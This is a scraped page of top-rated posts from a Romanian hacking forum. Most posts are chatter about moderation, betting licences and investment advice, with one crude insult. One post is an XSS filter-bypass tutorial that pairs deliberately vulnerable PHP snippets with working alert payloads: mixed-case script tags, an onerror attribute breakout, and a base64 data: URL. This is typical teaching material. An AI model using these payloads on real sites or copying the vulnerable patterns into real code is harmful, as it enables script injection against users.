Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/20/15 in all areas

  1. 0xStrait. Tinkode e un caz mai special.
    1 point
  2. In acest tutorial va voi arata 4 tipuri de bypasuri XSS si cam cum arata scriptul in spate. Sa inepem ! Fara Filtru. Varianta fara filtru nu prea iti da batai de cap deoarece se introduce direct vectorul <script>alert(/xss/)</script> Cum apare acest tip de xss? Pur si simplu afiseaza toate informatiile care sunt trecute prin GET codu din spate arata cam asa <?php $functie =($_GET ['xss']); echo ("$functie ") ?> Ca sa afisezi alerta XSS vei face asa www.white-hackers.com/xss1.php?xss=<script>alert(2)</script> Bypass basic folosinduse de filtrul str_replace() Aceasta functie cauta un sir specificat (in cazul nostru) <script> si il modifica (in cazul nostru NULL) Haide sa vedeti si cum arata codu sursa pentru acest tip de XSS <?php echo 'Rezultat '.str_replace('script', null, $_GET['xss']); ?> Ca sa treci de acest filtru trebuie sa folosim un bypass (este foarte usor) www.white-hackers.com/xss2.php?xss=<ScRiPt>alert(2)</ScRiPt> XSS Filtru htmlentities() htmlentities converteste toate functiile din HTML . Intr-un cuvant toate tagurile din HTML le traduce in HTML (nu afecteaza codul sursa) Scriptul din spate o sa arate cam asa <?php echo "<img alt='' src='".htmlentities($_GET['xss'])."' />"; ?> Ca sa trecem de acest filtru trebuie sa continuam scriptul dar sa includem alerta acest lucru se va face cam asa www.white-hackers.com/xss3.php?xss=.' onerror='alert("XSS") Filtru folosinduse de data URLs Aceasta metoda este putin mai ciudata deoarece practic vom folosi datele URL care in cele mai multe cazuri sunt folosite pentru imagini pentru a le pastra ca si text intr-un HTML Haide sa vedem cum arata codul sursa <?php echo '<object data="'.htmlspecialchars($_GET['xss']).'"></object>'; ?> Ca sa afisam alerta XSS trebuie sa ne folosim de data:text/html;base64 iar dupa vom cripta in base64 vectorul <script>alert(2)</script> Deci va arata cam asa www.white-hackers.com/xss4.php?xss=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
    1 point
  3. Smecherie ca atunci cand un user care foloseste IE6 vrea sa dea flag sa nu poata. DOAR IE6 si nu ma contactati pentru altceva.
    1 point
  4. care e problema ca s-a stiut de el ? de unde ai tu impresia ca e acelasi xss din pipes ? pipes-urile au doar un parametru sau ce sloboz ? se numeste PROOF OF CONCEPT, ceea ce s-a incercat, desteptu pulii, nu conta xssu in sine, ci folosirea lui, desteptu pulii @tromfil : done
    1 point
  5. Multumesc ca ne-ai reamintit. Acum, fiind cu 30 de zile mai batran, speram sa fii mai intelept si astfel sa post-ezi continut util in aceasta comunitate. Da, categoric se vor lua masuri, care cu siguranta te vor afecta in cazul in care post-urile tale raman aceleasi din punct de vedere calitativ. Sunt slabe sanse sa fiu degradat intrucat sanctionez in mod impartial conform regulilor forum-ului. Desigur, doar ti-am dat ban, nu?
    -1 points
  6. Amice, un sfat crypteaza-le , ca tu te chinui sa le prinzii si copii prostii schimba parole..
    -1 points
  7. Te contrazic , franciza o iei doar offline , si o iei de la gsbet , sky , etc . Dupa noua lege intra in vigoare din luna martie , fiecare casa de pariuri online plateste taxe , impozite , licenta de functionare si inafara de asta ca am uitat sa zic mai sus , trebuie sa ai sediu in Ro pt asta . De ce crezi ca au disparut cateva site-uri importante de pariuri din romania ? crezi ca bet365 care e in toata lumea , a inchis inregistrarile aici ca nu faceau bani ? Nu le convine la toti sa plateasca taxe uriase in minunata noastra tara
    -1 points
  8. @D3xter nu se merita investitia mai ales daca nu ai un plan stabili, daca esti nou pe "piata" iti va fi greu sa te remarci.
    -1 points
×
×
  • Create New...